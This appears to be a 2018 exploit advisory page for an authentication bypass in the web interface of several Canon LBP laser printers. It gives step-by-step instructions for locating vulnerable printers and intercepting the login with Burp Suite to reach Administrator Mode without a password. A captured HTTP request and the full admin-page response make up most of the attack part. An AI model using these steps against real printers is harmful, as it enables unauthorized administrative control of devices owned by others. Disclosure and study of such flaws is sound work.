Canon LBP6650 / LBP3370 / LBP3460 / LBP7750C Authentication Bypass

2018.06.06
Credit: Huy Kha
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C] # Date: [3.6.2018] # Exploit Author: [Huy Kha] # Vendor Homepage: [http://global.canon.com] # Software Link: [ Website ] # Severity: High # Version: LBP6650, LBP3370, LBP3460, LBP7750C # Tested on: Mozilla FireFox # Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers. It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication. # PoC : Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers. You can recognize them with the /tlogin.cgi parameter, but the version is also been displayed on the webinterface. https://imgur.com/a/QE3GfLw # Example : 1. Go to the following url: http://127.0.0.1/tlogin.cgi 2. Click on Administrator Mode 3. Intercept now the request with Burpsuite and click on 'Ok'' to login. And forward the request till you get the ''/frame.cgi?page=DevStatus'' parameter. # Request : GET /frame.cgi?page=DevStatus HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/tlogin.cgi Cookie: CookieID=1610705327:; Login=11 Connection: close Upgrade-Insecure-Requests: 1 # Response : HTTP/1.1 200 OK Date: MON, 05 JAN 1970 16:35:57 GMT Server: CANON HTTP Server Content-Type: text/html Content-Length: 5652 <html> <head> <meta http-equiv="content-type" content="text/html;charset=iso-8859-1"> <meta http-equiv="pragma" content="no-cache"/> <meta http-equiv="cache-control" content="no-cache,no-store,max-age=0"/> <meta http-equiv="expires" content="Thu 01 Jan 1970 00:00:00 GMT"/> <script language="JavaScript"> document.write('<title>Remote UI <'); switch("DevStatus") { case "DevStatus":document.write('Status');break; case "DevError":document.write('Error Information');break; case "DevUtil":document.write('Utility Menu');break; case "DevCtrl":document.write('Device Control');break; case "DevCalib":document.write('Calibration');break; case "DevInfo":document.write('Device Information');break; case "DevInfoSetDev":document.write('Change Device Information');break; case "DevInfoSetSecu":document.write('Change Administrator Settings');break; case "DevInfoSetIpSecu":document.write('Change IP Address Range');break; case "DevInfoSetIpv6Secu":document.write('Change IP Address Range');break; case "DevInfoSetMacSecu":document.write('Change Receiving Permitted MAC Address');break; case "DevInfoSetRuiSecu":document.write('Change Remote UI Setting');break; case "KeyManageSet":document.write('Key and Certificate');break; case "KeyManageDetail":document.write('Certificate Details');break; case "KeyManageNewKey":document.write('Generate Key and Certificate');break; case "KeyManageNewCert":document.write('#&Title_KeyManageNewCert');break; case "KeyManageKeyInst":document.write('Install Key and Certificate');break; case "KeyManageKeyPasswd":document.write('Enter Private Key Password');break; case "CaManageSet":document.write('CA Certificate');break; case "CaManageDetail":document.write('Certificate Details');break; case "CaManageKeyInst":document.write('Install CA Certificate');break; case "JobHistory":document.write('Job Log Display');break; case "DevFeature":document.write('Features');break; case "DevNetwork":document.write('Network');break; case "DevNetworkSetTcpip":document.write('Change TCP/IP Settings');break; case "DevNetworkSetNetware":document.write('Change NetWare Settings');break; case "DevNetworkSetApTalk":document.write('Change AppleTalk Settings');break; case "DevNetworkSetSMB":document.write('Change SMB Protocol Settings');break; case "DevNetworkSetNetIF":document.write('Change Ethernet Driver Setting');break; case "DevNetworkSetSNMP":document.write('Change SNMP Settings');break; case "DevNetworkSetSNMPV3User":document.write('User Settings');break; case "DevNetworkSetSNMPV3ConText":document.write('Context Settings');break; case "DevNetworkSetSNMPV3ConTextSet":document.write('Context Settings');break; case "DevNetworkSetSpool":document.write('Change Spooler Setting');break; case "DevNetworkSetNWakeUp":document.write('Change Startup Time');break; case "DevNetworkParList":document.write('Parameter List');break; case "DevNetworkFactDef":document.write('Initialize Network Settings');break; case "DevNetworkSetEmail":document.write('Change E-mail Print Settings');break; case "EmailRecv":document.write('Receive E-mails');break; case "DevIDControl":document.write('Department ID Management');break; case "DevIDSetting":document.write('Department ID Management');break; case "DevIDRegist":document.write('Department ID Management');break; case "DevIDEdit":document.write('Department ID Management');break; case "DevCount":document.write('Counter Check');break; case "JobPrtProp":document.write('Print Job Details');break; case "JobPrtSecure":document.write('Unlock');break; case "JobStore":document.write('Stored Job');break; case "JobStoreList":document.write('#&Title_JobStoreList');break; case "JobStoreEnterPwd":document.write('Enter Password');break; case "JobStoreProp":document.write('Stored Job Details');break; case "JobStoreExec":document.write('Print Stored Job');break; case "JobStoreBoxProp":document.write('Change Box Settings');break; case "JobLog":document.write('Print Log');break; case "EmailLog":document.write('E-mail Receive Log');break; case "PdfPrint":document.write('Direct Print');break; case "PsPrint":document.write('Direct Print');break; case "ImgPrint":document.write('Direct Print');break; case "CfgCtrl":document.write('Control Menu');break; case "CfgCtrlSet":document.write('Change Control');break; case "CfgCtrlTimeSet":document.write('Change Date and Time');break; case "CfgPaper":document.write('Paper Source Menu');break; case "CfgPaperSet":document.write('Change Paper Source');break; case "CfgLayout":document.write('Layout Menu');break; case "CfgLayoutSet":document.write('Change Layout');break; case "CfgQuality":document.write('Quality Menu');break; case "CfgQualitySet":document.write('Change Quality');break; case "CfgUserMainte":document.write('User Maintenance Menu');break; case "CfgUserMainteSet":document.write('Change User Maintenance');break; case "CfgExpCard":document.write('Extension Card');break; case "SupLink":document.write('Support Links');break; case "SupLinkSet":document.write('Edit Support Links');break; case "Debug":document.write('Debug');break; case "Syslog":document.write('System Log');break; default:document.write('');break; } document.write('> : LBP6650 ; LBP6650</title>'); var url = new String(document.location); var ssl = "0"; if( ssl == '1') { if(url.match("https") == null ) { document.location.href = "blank.html"; } } </script> </head> <frameset cols="185,*" frameborder="NO" border="0" framespacing="0" > <frame src="/menu.cgi?Type=DEVICE" marginwidth="8" marginheight="0" name="Index" noresize scrolling="NO"> <frame src="/dstatus.cgi" name="Body"> </frameset> <noframes> <body> </body> </noframes> </html> # Do we have now access to the printer with Admin Mode? : Yes # How to fix this? : Remove the default password and add a new (strong) password. # Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode)

References:

https://imgur.com/a/QE3GfLw


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top